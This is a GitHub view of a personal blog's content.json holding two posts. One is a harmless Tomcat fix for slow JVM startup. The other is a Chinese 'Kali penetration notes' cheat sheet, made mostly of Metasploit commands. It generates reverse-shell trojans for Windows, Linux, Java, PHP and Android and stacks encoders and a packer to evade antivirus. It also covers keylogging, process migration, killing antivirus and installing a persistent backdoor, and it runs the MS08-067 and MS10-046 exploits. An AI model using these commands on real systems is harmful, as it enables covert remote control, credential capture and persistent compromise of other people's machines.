-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcontent.json
1 lines (1 loc) · 8.27 KB
/
content.json
1
{"meta":{"title":"若兮相言","subtitle":"先栽树后乘凉","description":null,"author":"Rxxy","url":"https://rxxy.github.io"},"pages":[{"title":"","date":"2017-08-28T02:33:19.024Z","updated":"2017-08-28T02:33:19.024Z","comments":false,"path":"tags/index.html","permalink":"https://rxxy.github.io/tags/index.html","excerpt":"","text":""}],"posts":[{"title":"kali渗透笔记","slug":"kali渗透笔记","date":"2016-12-26T15:45:39.380Z","updated":"2017-08-28T01:23:24.868Z","comments":true,"path":"2016/12/26/cj6vqjyyc0002a8tws5j9r869/","link":"","permalink":"https://rxxy.github.io/2016/12/26/cj6vqjyyc0002a8tws5j9r869/","excerpt":"","text":"#kali渗透笔记 Windows shellCode usege/root生成木马hello.exe Lhost本机ip Lpost回连端口 windows/meterpreter/reverse_tcp LHOST=192.168.159.128LPORT=1211 X或E >hello.exe12345678910111213msf > use exploit/multi/handlermsf exploit(handler) > set payloadwindows/meterpreter/reverse_tcppayload=> windows/meterpreter/reverse_tcpmsfexploit(handler) > set LHOST 192.168.159.128LHOST=> 192.168.159.128msf exploit(handler) > set LPORT1211LPORT => 1211msf exploit(handler) > exploit``` 开始侦听,在目标端运行木马即可获取shell ##### linux下攻击载荷```msfpayloadlinux/x86/meterpreter/rverse_tcp LHOST=192.168.159.128 LPORT=1212 X >hello.shmsf exploit(handler) > set payloadlinux/x86/meterpreter/reverse_tcppayload =>linux/x86/meterpreter/reverse_tcp java下攻击载荷java/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=1212 X >hello.jar```123 ##### php下攻击载荷```msfpayloadphp/meterpreter/reverse_tcp LHOST=192.168.159.128LPORT=1212 R > 123.php Android下攻击载荷1msfpayloadandroid/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=7777 R> /root/hello.apk shellCode免杀多重编码免杀(弱):windows/meterpreter/rverse_tcpLHOST=192.168.159.128 LPORT=1212 R|Msfencode -ex86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5-t exe -o1 -o /root/hello.exe 加壳Upx -5hello.exe meterpreter基本命令 screenshot截屏sysinfo系统信息ps查看进程migrate 1323切换进程(使木马寄存在其他进程上)Run post/windows/capture/keylog_recorder记录键盘输入 持久控制run post/windows/manage/migrate自动切换进程run killav 关闭正在运行的cmd服务器安装后门run metsvc -A 安装后门使用后门:use exploit/multi/handlerset payloadwindows/metsvc_bind_tcpset RHOST 192.168.159.1set LPORT 31337exploit 漏洞利用:Ms10-046useexploit/windows/browser/ms10_046_shortcut_icon_dllloaderSRVHOST LHOST 设置为本机ipPayload: set payload windows/shell/reverse_tcp Ms08-067set payloadwindows/meterpreter/reverse_tcpRHOSTLHOST Targets: 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) 8 Windows XP SP2 Arabic (NX) 9 Windows XP SP2 Chinese - Traditional / Taiwan (NX) 10 Windows XP SP2 Chinese - Simplified (NX) 11 Windows XP SP2 Chinese - Traditional (NX) 12 Windows XP SP2 Czech (NX) 13 Windows XP SP2 Danish (NX) 14 Windows XP SP2 German (NX) 15 Windows XP SP2 Greek (NX) 16 Windows XP SP2 Spanish (NX) 17 Windows XP SP2 Finnish (NX) 18 Windows XP SP2 French (NX) 19 Windows XP SP2 Hebrew (NX) 20 Windows XP SP2 Hungarian (NX) 21 Windows XP SP2 Italian (NX) 22 Windows XP SP2 Japanese (NX) 23 Windows XP SP2 Korean (NX) 24 Windows XP SP2 Dutch (NX) 25 Windows XP SP2 Norwegian (NX) 26 Windows XP SP2 Polish (NX) 27 Windows XP SP2 Portuguese - Brazilian (NX) 28 Windows XP SP2 Portuguese (NX) 29 Windows XP SP2 Russian (NX) 30 Windows XP SP2 Swedish (NX) 31 Windows XP SP2 Turkish (NX) 32 Windows XP SP3 Arabic (NX) 33 Windows XP SP3 Chinese - Traditional / Taiwan (NX) 34 Windows XP SP3 Chinese - Simplified (NX) 35 Windows XP SP3 Chinese - Traditional (NX) 36 Windows XP SP3 Czech (NX) 37 Windows XP SP3 Danish (NX) 38 Windows XP SP3 German (NX) 39 Windows XP SP3 Greek (NX) 40 Windows XP SP3 Spanish (NX) 41 Windows XP SP3 Finnish (NX) 42 Windows XP SP3 French (NX) 43 Windows XP SP3 Hebrew (NX) 44 Windows XP SP3 Hungarian (NX) 45 Windows XP SP3 Italian (NX) 46 Windows XP SP3 Japanese (NX) 47 Windows XP SP3 Korean (NX) 48 Windows XP SP3 Dutch (NX) 49 Windows XP SP3 Norwegian (NX) 50 Windows XP SP3 Polish (NX) 51 Windows XP SP3 Portuguese - Brazilian (NX) 52 Windows XP SP3 Portuguese (NX) 53 Windows XP SP3 Russian (NX) 54 Windows XP SP3 Swedish (NX) 55 Windows XP SP3 Turkish (NX) 56 Windows 2003 SP1 English (NO NX) 57 Windows 2003 SP1 English (NX) 58 Windows 2003 SP1 Japanese (NO NX) 59 Windows 2003 SP1 Spanish (NO NX) 60 Windows 2003 SP1 Spanish (NX) 61 Windows 2003 SP2 English (NO NX) 62 Windows 2003 SP2 English (NX) 63 Windows 2003 SP2 German (NO NX) 64 Windows 2003 SP2 German (NX) 65 Windows 2003 SP2 Portuguese - Brazilian (NX) 66 Windows 2003 SP2 Spanish (NO NX) 67 Windows 2003 SP2 Spanish (NX) 68 Windows 2003 SP2 Japanese (NO NX)","categories":[],"tags":[{"name":"kali","slug":"kali","permalink":"https://rxxy.github.io/tags/kali/"},{"name":"渗透","slug":"渗透","permalink":"https://rxxy.github.io/tags/渗透/"}],"keywords":[]},{"title":"Tomcat 启动卡在部署项目时(linux)","slug":"Tomcat 启动卡在部署项目时(linux)","date":"2016-11-14T12:26:58.817Z","updated":"2017-08-28T01:23:51.196Z","comments":true,"path":"2016/11/14/cj6vqjyy20000a8twio19d6ht/","link":"","permalink":"https://rxxy.github.io/2016/11/14/cj6vqjyy20000a8twio19d6ht/","excerpt":"","text":"#Tomcat 启动卡在部署项目时(linux) 找到1```securerandom.source=file:/dev/./urandom 这时候根据修改内容就可以查到因为此原因不仅可以造成tomcat卡住,也会造成weblogic启动缓慢,linux或者部分unix系统提供随机数设备是/dev/random和/dev/urandom,两个有区别,urandom安全性没有random高,但random需要时间间隔生成随机数。jdk默认调用random。再后来,终于在weblogic的官方文档中 Monitoring and Troubleshooting 找到了 Avoiding JVM Delays Caused ByRandom Number Generation 这样一个标题。摘录如下: The library used for randomnumber generation in Sun’s JVM relies on /dev/random by default for UNIXplatforms. This can potentially block the Oracle WebLogic CommunicationServices process because on some operating systems /dev/random waits for acertain amount of “noise” to be generated on the host machine beforereturning a result. Although /dev/random is more secure, Oracle recommendsusing /dev/urandom if the default JVM configuration delays Oracle WebLogicCommunication Services startup. To determine if your operatingsystem exhibits this behavior, try displaying a portion of the file from ashell prompt: head -n 1 /dev/randomOpen the$JAVA_HOME/jre/lib/security/java.security file in a text editor. Change the line: securerandom.source=file:/dev/randomto read: securerandom.source=file:/dev/urandomSave your change and exit thetext editor.其中说到:可通过 head -n 1 /devrandom 查看是否你的系统会出现伪随机数提供等待。OK就这个,试了一下,果然,在服务器第一次启动后,这个可以快速提供一个值,但当再次调用时发生等待。 解决办法: 永久:oracle 说修改$JAVA_HOME/jre/lib/security/java.security文件,替换securerandom.source=file:/dev/random为securerandom.source=file:/dev/urandom。对所有使用JVM的应用生效。(这个永久的方法,这里面有个问题,就是设置时候实际应该设置为securerandom.source=file:/dev/./urandom,否则不生效) DOMAIN临时:修改startWeblogic.sh文件,JAVA_OPTIONS=”${SAVE_JAVA_OPTIONS}-Djava.security.egd=file:/dev/./urandom” 后继的SecureRandom 测试学习 编写JAVA类如下,运行测试,第一次正常,第二次等待,重启服务器后第一次又正常。启动加入参数-Djava.security.egd=file:/dev/./urandom 正常 来自[http://blog.csdn.net/njchenyi/article/details/46641141](http://blog.csdn.net/njchenyi/article/details/46641141) 原文地址:http://blog.csdn.net/njchenyi/article/details/46641141","categories":[],"tags":[{"name":"linux","slug":"linux","permalink":"https://rxxy.github.io/tags/linux/"},{"name":"tomcat","slug":"tomcat","permalink":"https://rxxy.github.io/tags/tomcat/"}],"keywords":[]}]}